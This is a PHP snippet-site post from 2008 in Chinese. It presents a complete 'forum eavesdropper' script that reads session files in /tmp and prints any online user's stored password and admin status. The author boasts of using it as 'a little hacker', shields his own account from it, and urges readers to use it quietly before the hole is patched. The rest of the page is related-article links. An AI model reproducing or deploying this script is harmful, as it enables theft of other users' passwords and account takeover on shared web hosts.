php查看session内容的函数


Posted in PHP onAugust 27, 2008

如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
php中常用编辑器推荐
Jan 02 PHP
php mysql Errcode: 28 终极解决方法
Jul 01 PHP
php之Memcache学习笔记
Jun 17 PHP
php写的AES加密解密类分享
Jun 20 PHP
php通过session防url攻击方法
Dec 10 PHP
php中使用in_array() foreach array_search() 查找数组是否包含时的性能对比
Apr 14 PHP
值得分享的php+ajax实时聊天室
Jul 20 PHP
php in_array() 检查数组中是否存在某个值详解
Nov 23 PHP
PHP更安全的密码加密机制Bcrypt详解
Jun 18 PHP
PHP使用redis消息队列发布微博的方法示例
Jun 22 PHP
详解PHP swoole process的使用方法
Aug 26 PHP
Laravel程序架构设计思路之使用动作类
Jun 07 PHP
php 缓存函数代码
Aug 27 #PHP
php 中文处理函数集合
Aug 27 #PHP
常用的php对象类型判断
Aug 27 #PHP
phpMyAdmin2.11.6安装配置方法
Aug 24 #PHP
PHP6 先修班 JSON实例代码
Aug 23 #PHP
php的curl实现get和post的代码
Aug 23 #PHP
PHP Smarty生成EXCEL文档的代码
Aug 23 #PHP
You might like
php ci框架验证码实例分析
2013/06/26 PHP
支持生僻字且自动识别utf-8编码的php汉字转拼音类
2014/06/27 PHP
PHP strip_tags() 去字符串中的 HTML、XML 以及 PHP 标签的函数
2016/05/22 PHP
php 基础函数
2017/02/10 PHP
fmt:formatDate的输出格式详解
2014/01/09 Javascript
深入分析JQuery和JavaScript的异同
2014/10/23 Javascript
JavaScript中的slice()方法使用详解
2015/06/06 Javascript
javascript 常见功能汇总
2015/06/11 Javascript
JavaScript Length 属性的总结
2015/11/02 Javascript
使用jQuery实现WordPress中的Ctrl+Enter和@评论回复
2016/05/21 Javascript
jQuery实现的简单百分比进度条效果示例
2016/08/01 Javascript
JS实现拖拽的方法分析
2016/12/20 Javascript
Angular-Touch库用法示例
2016/12/22 Javascript
Vue.2.0.5实现Class 与 Style 绑定的实例
2017/06/20 Javascript
node中koa中间件机制详解
2017/08/22 Javascript
详解Chart.js轻量级图表库的使用经验
2018/05/22 Javascript
微信小程序scroll-view仿拼多多横向滑动滚动条
2020/04/21 Javascript
javascript使用正则实现去掉字符串前面的所有0
2018/07/23 Javascript
使用JS代码实现俄罗斯方块游戏
2018/08/03 Javascript
微信小程序使用component自定义toast弹窗效果
2018/11/27 Javascript
如何在Vue.js中实现标签页组件详解
2019/01/02 Javascript
ES6 Object属性新的写法实例小结
2019/06/25 Javascript
Python中time模块和datetime模块的用法示例
2016/02/28 Python
python安装模块如何通过setup.py安装(超简单)
2018/05/05 Python
深入解析神经网络从原理到实现
2019/07/26 Python
什么是python的id函数
2020/06/11 Python
基于Tensorflow读取MNIST数据集时网络超时的解决方式
2020/06/22 Python
悦木之源美国官网:Origins美国
2016/08/01 全球购物
德国童装购物网站:NICKI´S.com
2018/04/20 全球购物
给导游的表扬信
2014/01/10 职场文书
火锅店创业计划书范文
2014/02/02 职场文书
初三新学期计划书
2014/05/03 职场文书
篮球社团活动总结
2014/06/27 职场文书
授权委托书
2014/07/31 职场文书
党务工作者主要事迹材料
2015/11/03 职场文书
小学语文国培研修日志
2015/11/13 职场文书